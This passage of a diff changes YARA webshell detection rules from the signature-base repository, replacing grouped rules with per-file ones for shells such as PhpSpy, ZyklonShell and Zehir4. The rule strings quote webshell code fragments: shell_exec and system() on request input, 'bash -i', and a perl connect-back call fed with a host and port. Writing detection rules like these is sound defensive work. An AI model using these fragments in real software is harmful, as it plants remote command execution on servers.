 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5296-L5313"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6530-L6546"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e82882e89a1aeb256768f2af7a6d3674c89f9abc358710b33b8d3d425defcef1"
+		hash = "e65e0670ef6edf0a3581be6fe5ddeeffd22014bf"
+		logic_hash = "52bfb14f4d5d3df787ce7782cbbee25ea1556758eed48e3001c8a3f35a541526"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "@ini_set(\"highlight" fullword
-		$s1 = "echo \"<b>Result of execution this PHP-code</b>:<br>\";" fullword
-		$s2 = "{$row[] = \"<b>Owner/Group</b>\";}" fullword
+		$s1 = "// Dump Database [pacucci.com]" fullword
+		$s2 = "$dump = \"-- Database: \".$_POST['db'] .\" \\n\";" fullword
+		$s7 = "$aids = passthru(\"perl cbs.pl \".$_POST['connhost'].\" \".$_POST['connport']);" fullword
+		$s8 = "<b>IP:</b> <u>\" . $_SERVER['REMOTE_ADDR'] .\"</u> - Server IP:</b> <a href='htt"
+		$s14 = "$dump .= \"-- Cyber-Warrior.Org\\n\";" fullword
+		$s20 = "if(isset($_POST['doedit']) && $_POST['editfile'] != $dir)" fullword
 
 	condition:
-		2 of them
+		3 of them
 }
-rule SIGNATURE_BASE__GFS_Web_Shell_Ver_3_1_7___Priv8_Php_Nshell_Php_Php_Gfs_Sh_Php_Php
+rule SIGNATURE_BASE_Webshell_Php_Include_W_Shell
 {
 	meta:
-		description = "Semi-Auto-generated  - from files GFS web-shell ver 3.1.7 - PRiV8.php.txt, nshell.php.php.txt, gfs_sh.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "4d1dd87b-1ffd-564d-9411-c5d2fc01ae0f"
+		description = "PHP Webshells Github Archive - file php-include-w-shell.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a80ca446-6612-51b4-99a7-8a8d8e6ee196"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5314-L5329"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6547-L6560"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9df5b6df25574b303044a0799c5eb5f38f9ebfbc6f6114275fe1e34adbde1f7c"
+		hash = "1a7f4868691410830ad954360950e37c582b0292"
+		logic_hash = "2be144060d4fdaee38214dc2eba80c2a6fd3699060d274e66356fd5a08c9be4b"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "be0f67f3e995517d18859ed57b4b4389"
-		hash1 = "4a44d82da21438e32d4f514ab35c26b6"
-		hash2 = "f618f41f7ebeb5e5076986a66593afd1"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "echo $uname.\"</font><br><b>\";" fullword
-		$s3 = "while(!feof($f)) { $res.=fread($f,1024); }" fullword
-		$s4 = "echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()"
+		$s13 = "# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!" fullword
+		$s17 = "\"phpshellapp\" => \"export TERM=xterm; bash -i\"," fullword
+		$s19 = "else if($numhosts == 1) $strOutput .= \"On 1 host..\\n\";" fullword
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_C99Shell_V1_0_Php_Php_Specialshell_99_Php_Php
+rule SIGNATURE_BASE_Webshell_Mysql_Tool
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		description = "PHP Webshells Github Archive - file mysql_tool.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a22a0a5c-a686-517e-b1f9-279edab0616b"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5330-L5348"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6561-L6573"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0f44dc1ff243b234a718e8dbd5cc8c4dc8eb9d3b63300a5c6ff72b86280607bf"
+		hash = "c9cf8cafcd4e65d1b57fdee5eef98f0f2de74474"
+		logic_hash = "611636b3fa9a3163574b18cf8eacebea9733a1ad381261387f79a532b003e8fd"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash4 = "09609851caa129e40b0d56e90dfc476c"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "c99ftpbrutecheck"
-		$s1 = "$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);" fullword
-		$s2 = "$fqb_lenght = $nixpwdperpage;" fullword
-		$s3 = "$sock = @ftp_connect($host,$port,$timeout);" fullword
+		$s12 = "$dump .= \"-- Dumping data for table '$table'\\n\";" fullword
+		$s20 = "$dump .= \"CREATE TABLE $table (\\n\";" fullword
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE__W_Php_Php_Wacking_Php_Php_C99Shell_V1_0_Php_Php_C99Php_Specialshell_99_Php_Php
+rule SIGNATURE_BASE_Webshell_Phpspy_Ver_2006
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		description = "PHP Webshells Github Archive - file PhpSpy Ver 2006.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "adbb1963-31c8-5540-a679-c75b1101c163"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5349-L5365"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6574-L6588"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e9cd7425b806f71d8889f5df7f3fc2f4a692279fc4e495104646cfe28c5b5fe5"
+		hash = "34a89e0ab896c3518d9a474b71ee636ca595625d"
+		logic_hash = "69bd2c387b0e676168116f3b3c3c081e08fd555cc6bc9a94b9c8ef97f194b09f"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash2 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash3 = "9e9ae0332ada9c3797d6cee92c2ede62"
-		hash4 = "09609851caa129e40b0d56e90dfc476c"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$sqlquicklaunch[] = array(\""
-		$s1 = "else {echo \"<center><b>File does not exists (\".htmlspecialchars($d.$f).\")!<"
+		$s2 = "var_dump(@$shell->RegRead($_POST['readregname']));" fullword
+		$s12 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname."
+		$s19 = "$program = isset($_POST['program']) ? $_POST['program'] : \"c:\\winnt\\system32"
+		$s20 = "$regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\\winnt\\backdoor.exe'"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE__Antichat_Php_Php_Fatalshell_Php_Php_A_Gedit_Php_Php
+rule SIGNATURE_BASE_Webshell_Zyklonshell
 {
 	meta:
-		description = "Semi-Auto-generated  - from files antichat.php.php.txt, Fatalshell.php.php.txt, a_gedit.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "6bf5640f-0773-5d93-8d27-0844062017c7"
+		description = "PHP Webshells Github Archive - file ZyklonShell.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4d7ff3e5-4940-52c8-b045-5db1523f70c2"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5366-L5382"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6589-L6603"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "789340845aeed4accaef02afa1a1fe420e73b6f5af1b621f4ec2342994045278"
+		hash = "3fa7e6f3566427196ac47551392e2386a038d61c"
+		logic_hash = "5d49f2599781836156f6bbb0c50cfcffdb2ca51c7cb688abbc6245d7f856ad01"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "128e90b5e2df97e21e96d8e268cde7e3"
-		hash1 = "b15583f4eaad10a25ef53ab451a4a26d"
-		hash2 = "ab9c6b24ca15f4a1b7086cad78ff0f78"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "if(@$_POST['save'])writef($file,$_POST['data']);" fullword
-		$s1 = "if($action==\"phpeval\"){" fullword
-		$s2 = "$uploadfile = $dirupload.\"/\".$_POST['filename'];" fullword
-		$s3 = "$dir=getcwd().\"/\";" fullword
+		$s0 = "The requested URL /Nemo/shell/zyklonshell.txt was not found on this server.<P>" fullword
+		$s1 = "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">" fullword
+		$s2 = "<TITLE>404 Not Found</TITLE>" fullword
+		$s3 = "<H1>Not Found</H1>" fullword
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE__C99Shell_V1_0_Php_Php_C99Php_Sses_Php_Php
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Myshell_2
 {
 	meta:
-		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		description = "PHP Webshells Github Archive - file myshell.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
+		old_rule_name = "WebShell_php_webshells_myshell"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5383-L5396"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6604-L6619"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b2bdf4187ff3d63e4af5c70e8cc93cd8fac3257b33c38764ad2bb2e206066162"
+		hash = "5bd52749872d1083e7be076a5e65ffcde210e524"
+		logic_hash = "7765e43189d6ec0cda0b58d00cfd7fc8cec89287dbac7487083b6ce1ce55f306"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
-		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "if (!empty($delerr)) {echo \"<b>Deleting with errors:</b><br>\".$delerr;}" fullword
+		$s0 = "if($ok==false &&$status && $autoErrorTrap)system($command . \" 1> /tmp/outpu"
+		$s5 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o"
+		$s15 = "<title>$MyShellVersion - Access Denied</title>" fullword
+		$s16 = "}$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTT"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE__Crystal_Php_Nshell_Php_Php_Load_Shell_Php_Php
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Lolipop
 {
 	meta:
-		description = "Semi-Auto-generated  - from files Crystal.php.txt, nshell.php.php.txt, load_shell.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "a92134cd-7f10-589f-bcda-508bc7a20efe"
+		description = "PHP Webshells Github Archive - file lolipop.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5397-L5412"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6620-L6633"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "71a9310b19b66e3699f75f551cc604f535ea843eb9c50f4a009edcd9c11e01b9"
+		hash = "86f23baabb90c93465e6851e40104ded5a5164cb"
+		logic_hash = "8b0dcf76a244f80d4bee0c62189df55c1f8d71cf0900cd8ebb5916f5fe972bed"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "fdbf54d5bf3264eb1c4bff1fac548879"
-		hash1 = "4a44d82da21438e32d4f514ab35c26b6"
-		hash2 = "0c5d227f4aa76785e4760cdcff78a661"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "if ($filename != \".\" and $filename != \"..\"){" fullword
-		$s1 = "$dires = $dires . $directory;" fullword
-		$s4 = "$arr = array_merge($arr, glob(\"*\"));" fullword
+		$s3 = "$commander = $_POST['commander']; " fullword
+		$s9 = "$sourcego = $_POST['sourcego']; " fullword
+		$s20 = "$result = mysql_query($loli12) or die (mysql_error()); " fullword
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE__Nst_Php_Php_Cybershell_Php_Php_Img_Php_Php_Nstview_Php_Php
+rule SIGNATURE_BASE_Webshell_Simple_Cmd
 {
 	meta:
-		description = "Semi-Auto-generated  - from files nst.php.php.txt, cybershell.php.php.txt, img.php.php.txt, nstview.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "cc4dc0e9-dbb1-560b-ae36-23d3e16a407f"
+		description = "PHP Webshells Github Archive - file simple_cmd.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1fd0c01a-c265-5e30-ab36-e8e93e316fbe"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5413-L5429"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6634-L6648"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "afc0b1c83644aa323d308471e5978b6b03f444f5f46fbaddac28ff42d524df1e"
+		hash = "466a8caf03cdebe07aa16ad490e54744f82e32c2"
+		logic_hash = "82a65f4bbdcd2fc626aa9f36fe530d19aa19a48389e970c26e525597818914ee"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "ddaf9f1986d17284de83a17fe5f9fd94"
-		hash1 = "ef8828e0bc0641a655de3932199c0527"
-		hash2 = "17a07bb84e137b8aa60f87cd6bfab748"
-		hash3 = "4745d510fed4378e4b1730f56f25e569"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "@$rto=$_POST['rto'];" fullword
-		$s2 = "SCROLLBAR-TRACK-COLOR: #91AAFF" fullword
-		$s3 = "$to1=str_replace(\"//\",\"/\",$to1);" fullword
+		$s1 = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword
+		$s2 = "<title>G-Security Webshell</title>" fullword
+		$s4 = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword
+		$s6 = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_Dc3_Security_Crew_Shell_Priv_Php_Specialshell_99_Php_Php
+rule SIGNATURE_BASE_Webshell_Go_Shell
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "d22c4cc3-842b-5a24-bf4b-a8024b447b9e"
+		description = "PHP Webshells Github Archive - file go-shell.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "63eaf530-050a-5db7-8885-d4a1e86d62de"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5430-L5446"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6649-L6664"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7a4c74912caa1855efc3a2ea7fa6d0082f62776d77a211e59f12892d4883f240"
+		hash = "3dd85981bec33de42c04c53d081c230b5fc0e94f"
+		logic_hash = "f2fcefb9a0536c80fa74ceb002e113f95de53d1f56e22c81b542c395dd11071d"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "433706fdc539238803fd47c4394b5109"
-		hash4 = "09609851caa129e40b0d56e90dfc476c"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = " if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\":"
-		$s1 = " $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";" fullword
+		$s0 = "#change this password; for power security - delete this file =)" fullword
+		$s2 = "if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};" fullword
+		$s11 = "open(FILEHANDLE, \"cd $param{dir}&&$param{cmd}|\");" fullword
+		$s12 = "print << \"[kalabanga]\";" fullword
+		$s13 = "<title>GO.cgi</title>" fullword
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE__C99Shell_V1_0_Php_Php_C99Php_1_C2007_Php_Php_C100_Php
+rule SIGNATURE_BASE_Webshell_Azrailphp_V1_0_2
 {
 	meta:
-		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, 1.txt, c2007.php.php.txt, c100.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		description = "PHP Webshells Github Archive - file aZRaiLPhp v1.0.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "10546549-e16d-567d-9d88-3d37fe8ff03f"
 		date = "2025-03-29"
 		modified = "2025-03-29"
+		old_rule_name = "WebShell_aZRaiLPhp_v1_0"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5447-L5462"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6665-L6680"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a5dc73a12d8c8b89bab77b90cb3b561e9daf9db5f5ad550326a2fbce52c1c8da"
+		hash = "a2c609d1a8c8ba3d706d1d70bef69e63f239782b"
+		logic_hash = "8309338bb327cc14ae5970bd921b3dba68353d55be31b9dbbc5374ded24ed563"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
-		hash2 = "44542e5c3e9790815c49d5f9beffbbf2"
-		hash3 = "d089e7168373a0634e1ac18c0ee00085"
-		hash4 = "38fd7e45f9c11a37463c3ded1c76af4c"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$result = mysql_query(\"SHOW PROCESSLIST\", $sql_sock); " fullword
+		$s0 = "<font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$RED"
+		$s4 = "$fileperm=base_convert($_POST['fileperm'],8,10);" fullword
+		$s19 = "touch (\"$path/$dismi\") or die(\"Dosya Olu" fullword
+		$s20 = "echo \"<div align=left><a href='./$this_file?dir=$path/$file'>G" fullword
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Multiple_Php_Webshells_2
+rule SIGNATURE_BASE_Webshell_Webshells_Zehir4
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		description = "Webshells Github Archive - file zehir4"
+		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5463-L5483"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6681-L6694"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "26fe586ba7f4d1931b2df81aa27543ff422e699fd56b6b1be289a0f8d6954691"
-		score = 75
+		hash = "788928ae87551f286d189e163e55410acbb90a64"
+		logic_hash = "36b6940ffecd9be190cce62252ec7d87f1c0bc0d19b4442df63f4404eb316364"
+		score = 55
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
-		hash5 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
-		hash6 = "09609851caa129e40b0d56e90dfc476c"
-		hash7 = "671cad517edd254352fe7e0c7c981c39"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "elseif (!empty($ft)) {echo \"<center><b>Manually selected type is incorrect. I"
-		$s1 = "else {echo \"<center><b>Unknown extension (\".$ext.\"), please, select type ma"
-		$s3 = "$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";" fullword
+		$s0 = "frames.byZehir.document.execCommand(command, false, option);" fullword
+		$s8 = "response.Write \"<title>ZehirIV --> Powered By Zehir &lt;zehirhacker@hotmail.com"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_1_Specialshell_99_Php_Php
+rule SIGNATURE_BASE_Webshell_Zehir4_Asp_Php
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "4915146e-141c-5515-ac5a-61901d42dc40"
+		description = "PHP Webshells Github Archive - file zehir4.asp.php.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7a849bc6-fff5-5bb6-aff7-660889fd077b"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5484-L5502"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6695-L6708"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "160adf93d4f9e51022c427b2b0601207dd9ca917e98d99e2013fe83e09a85d21"
+		hash = "1d9b78b5b14b821139541cc0deb4cbbd994ce157"
+		logic_hash = "dfaf685ac3b364143bfbe289b05f066b09f01622fec3e9157f4b4791f7567619"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "44542e5c3e9790815c49d5f9beffbbf2"
-		hash4 = "09609851caa129e40b0d56e90dfc476c"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "if ($total === FALSE) {$total = 0;}" fullword
-		$s1 = "$free_percent = round(100/($total/$free),2);" fullword
-		$s2 = "if (!$bool) {$bool = is_dir($letter.\":\\\\\");}" fullword
-		$s3 = "$bool = $isdiskette = in_array($letter,$safemode_diskettes);" fullword
+		$s4 = "response.Write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&"
+		$s11 = "frames.byZehir.document.execCommand("
+		$s15 = "frames.byZehir.document.execCommand(co"
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE__R577_Php_Php_R57_Php_Php_Spy_Php_Php_S_Php_Php
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Lostdc
 {
 	meta:
-		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "022d2255-50cd-500b-8d91-8e34f3c46fcf"
+		description = "PHP Webshells Github Archive - file lostDC.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L5503-L5519"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6709-L6724"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7ba3d6927dc06bfcd98ee9d7146164ca9a9024ef26eac60fabc8ed1375db618d"
+		hash = "d54fe07ea53a8929620c50e3a3f8fb69fdeb1cde"
+		logic_hash = "e3cd28f4a72f5a8a92c728fe76a7159c28256e87daf4c1dd10190a57263f5b45"
 		score = 75
 		quality = 85
 		tags = ""
-		super_rule = 1
-		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
-		hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f"
-		hash2 = "eed14de3907c9aa2550d95550d1a2d5f"
-		hash3 = "817671e1bdc85e04cc3440bbd9288800"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
